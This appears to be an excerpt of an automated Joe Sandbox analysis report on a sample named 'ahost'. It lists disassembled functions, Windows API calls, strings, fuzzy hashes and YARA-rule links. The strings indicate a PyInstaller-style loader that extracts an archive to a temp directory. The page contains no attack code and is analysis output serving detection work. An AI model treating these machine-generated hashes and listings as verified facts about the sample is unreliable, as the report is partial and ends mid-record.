Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 25ffcb3d7ceb1a0c63f1bc185bbc53a57f859ebb0c3f1d7374ee1fd0df8b4536
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 91F04422A1974187FBA0AF60BC4976AE360AB84764F840335DA7D426D8DF3CE0598A50

Function 00007FF7F91E1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F91E7F80: _fread_nolock.LIBCMT ref: 00007FF7F91E802A

_fread_nolock.LIBCMT ref: 00007FF7F91E1A1B

Part of subcall function 00007FF7F91E2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F91E1B6A), ref: 00007FF7F91E295E

Strings

malloc, xrefs: 00007FF7F91E1B22
MEI, xrefs: 00007FF7F91E1991
calloc, xrefs: 00007FF7F91E1A68
Could not read full TOC!, xrefs: 00007FF7F91E1B55
Could not allocate buffer for TOC!, xrefs: 00007FF7F91E1B1B
Could not allocate memory for archive structure!, xrefs: 00007FF7F91E1A61
Failed to read cookie!, xrefs: 00007FF7F91E1A2B
fseek, xrefs: 00007FF7F91E19F5
Failed to seek to cookie position!, xrefs: 00007FF7F91E19EE
Error on file., xrefs: 00007FF7F91E1B8D
fread, xrefs: 00007FF7F91E1A32, 00007FF7F91E1B5C

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
Instruction ID: 595fa4c15704cc15ec1892222d3e6403c823762d84e9e687e1e3167b456afd6c
Opcode Fuzzy Hash: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
Instruction Fuzzy Hash: 6D816071E0868686FB60FF14E8502B9A3B0AF48744F844435DAAE877DDDE3CF54587A1

Function 00007FF7F91E1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7F91E17DF
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7F91E17CA
fwrite, xrefs: 00007FF7F91E17D1
malloc, xrefs: 00007FF7F91E1749
Failed to extract %s: failed to open target file!, xrefs: 00007FF7F91E165C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7F91E16DA
Failed to create symbolic link %s!, xrefs: 00007FF7F91E1622
fopen, xrefs: 00007FF7F91E1663
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7F91E16A2
fseek, xrefs: 00007FF7F91E16E1
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7F91E1742
fread, xrefs: 00007FF7F91E17E6

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
Instruction ID: 7dfd2bb52a813cd2fa88728084e818a4f36b1660c0b5f18bdf84a4a0273ce494
Opcode Fuzzy Hash: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
Instruction Fuzzy Hash: 48516B61E0864692FB20BF11AC105A9A3B0AF84B94FC44531EE2D477EAEE3CF55587A1

Function 00007FF7F91E8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E88FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E893C

Part of subcall function 00007FF7F91E8A20: GetEnvironmentVariableW.KERNEL32(00007FF7F91E388E), ref: 00007FF7F91E8A57
Part of subcall function 00007FF7F91E8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F91E8A79

Part of subcall function 00007FF7F91F82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F82C1

Part of subcall function 00007FF7F91E2810: MessageBoxW.USER32 ref: 00007FF7F91E28EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF7F91E88CC
_MEI%d, xrefs: 00007FF7F91E8902
TMP, xrefs: 00007FF7F91E88B2
TMP, xrefs: 00007FF7F91E888C, 00007FF7F91E8993
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7F91E896E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: 425e2add9f0efa98f02918cfb6cdd6fa3ee344ec3189ef40375b0e480b23fa60
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: 3B419F11E0964642FB68BF25BD552B992B1AF84784FC00131EE2D477EEEE3CE50583E2

Function 00007FF7F91E1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF7F91E12C1, 00007FF7F91E12F6
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7F91E12BA
1.3.1, xrefs: 00007FF7F91E1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7F91E12EF
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7F91E141E
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7F91E1276

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
Instruction ID: 8eb643ec19bcdea21e095f0314af4773546b0d5ad10ebdf1178a366905125921
Opcode Fuzzy Hash: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
Instruction Fuzzy Hash: EE519122E0864282FB61BF15B8103BAA2A1AB85794FC44135EE6E477D9EF3CE5418791

Function 00007FF7F91FED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7F91FF11A,?,?,-00000018,00007FF7F91FADC3,?,?,?,00007FF7F91FACBA,?,?,?,00007FF7F91F5FAE), ref: 00007FF7F91FEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF7F91FF11A,?,?,-00000018,00007FF7F91FADC3,?,?,?,00007FF7F91FACBA,?,?,?,00007FF7F91F5FAE), ref: 00007FF7F91FEF08

Strings

api-ms-, xrefs: 00007FF7F91FEE46
ext-ms-, xrefs: 00007FF7F91FEE59

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: eecde7c6ea699e9c6b7cf2505e17ef71a381290a3032c452aa2b6ac0013e6856
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 0741F321F19A0681FB16EF16BD04576A2B1BF84BA4FC84535DE3D877D9EE3CE40482A0

Function 00007FF7F91E36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36E1
GetLastError.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36EB

Part of subcall function 00007FF7F91E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
Part of subcall function 00007FF7F91E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
Part of subcall function 00007FF7F91E2C50: MessageBoxW.USER32 ref: 00007FF7F91E2D99

Strings

Failed to obtain executable path., xrefs: 00007FF7F91E36F3
\\?\, xrefs: 00007FF7F91E375A
Failed to convert executable path to UTF-8., xrefs: 00007FF7F91E3790
GetModuleFileNameW, xrefs: 00007FF7F91E36FA
Failed to resolve full path to executable %ls., xrefs: 00007FF7F91E3739

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 5a8add56418033b7c39bdd4b8d641fa12143a0809633e240a8bfd8e2d45399db
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: FA214FA1F1864242FB61BF24FC113BAA2B0BF44354FC04131D67D825EDEE2CE50583A5

Function 00007FF7F91FBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FBEF9

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: 9884b20202ac9e5118205879b2a86619ab924cd8e6f72585e4f3ceca5fcae30c
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: 35C1D522E4868A41F770AF15A8402BDA771EB81B88FD54131EB7E037D9EF7CE45583A0

Function 00007FF7F91E8760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7F91E8780
OpenProcessToken.ADVAPI32 ref: 00007FF7F91E8793
GetTokenInformation.KERNELBASE ref: 00007FF7F91E87B8
GetLastError.KERNEL32 ref: 00007FF7F91E87C2
GetTokenInformation.KERNELBASE ref: 00007FF7F91E8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F91E881E
CloseHandle.KERNEL32 ref: 00007FF7F91E8836

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 3e67797ca99e94f9b8a64403ca713613a826ad76c5961b2764defaac184ec210
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 9A214F21E0864642EB54BF55B85462AE3B1EB85BA0F900235EA7D83AF8DE6CE4548790

Function 00007FF7F91E90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F91E8760: GetCurrentProcess.KERNEL32 ref: 00007FF7F91E8780
Part of subcall function 00007FF7F91E8760: OpenProcessToken.ADVAPI32 ref: 00007FF7F91E8793
Part of subcall function 00007FF7F91E8760: GetTokenInformation.KERNELBASE ref: 00007FF7F91E87B8
Part of subcall function 00007FF7F91E8760: GetLastError.KERNEL32 ref: 00007FF7F91E87C2
Part of subcall function 00007FF7F91E8760: GetTokenInformation.KERNELBASE ref: 00007FF7F91E8802
Part of subcall function 00007FF7F91E8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F91E881E
Part of subcall function 00007FF7F91E8760: CloseHandle.KERNEL32 ref: 00007FF7F91E8836

LocalFree.KERNEL32(?,00007FF7F91E3C55), ref: 00007FF7F91E916C
LocalFree.KERNEL32(?,00007FF7F91E3C55), ref: 00007FF7F91E9175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7F91E9183
S-1-3-4, xrefs: 00007FF7F91E9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7F91E9142
D:(A;;FA;;;%s), xrefs: 00007FF7F91E9157

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction ID: f52c2e59d6eabb2681fe2eb025459f3205580425a49e92bc7aa3a3892b7ead54
Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction Fuzzy Hash: 88212C21E0874282F754BF10ED156EAA275EF88780FC44431EA6E977DADE3CE44587A1

Function 00007FF7F91FCFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F91FCFBB), ref: 00007FF7F91FD0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F91FCFBB), ref: 00007FF7F91FD177

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 95ac1f716c7b547e45bd5979ec6250e9bc7c00d28693dac436bdd0a91e3080b6
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 2391D526E1865985F750AF65AC402BDABB0AB40B8CF944135DF3E57AC8EF38D446C7E0

Function 00007FF7F91F5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F56C5
CreateFileW.KERNELBASE ref: 00007FF7F91F5704
CloseHandle.KERNEL32 ref: 00007FF7F91F5739

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 5b99d0963e6d5cbf6175fddd5112a3b6e5f3c26b27ac0fc5bf3803346ebff192
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 3941A622D1878583F750AF20A914379A670FB94758F908335E77C03AD9EF7CA5E087A0

Function 00007FF7F91ECCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F91ECE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7F91ECE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7F91ECCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF7F91ECD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7F91ECD91

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 559177495319094697045fd01ce889ceb8905b357269d72fbb773dcead9883eb
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 79312B24E0814646FB64BF24BC213B9A6B1AF41384FC44434EA3E472DFDE2DB50582F2

Function 00007FF7F91F9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7F91F9A9C), ref: 00007FF7F91F9AB1
TerminateProcess.KERNEL32(?,?,?,00007FF7F91F9A9C), ref: 00007FF7F91F9ABC
ExitProcess.KERNEL32 ref: 00007FF7F91F9ACB

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 8a88b46d2201af9c89bc7ecee7a6ba6d2b91abfc5e5834153926408265c6a977
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: BBD06714F0864A42FF683F706C9907C9271AF48745B941438CA3B463EFED2CA44943A0

Function 00007FF7F91F01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F02E7

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
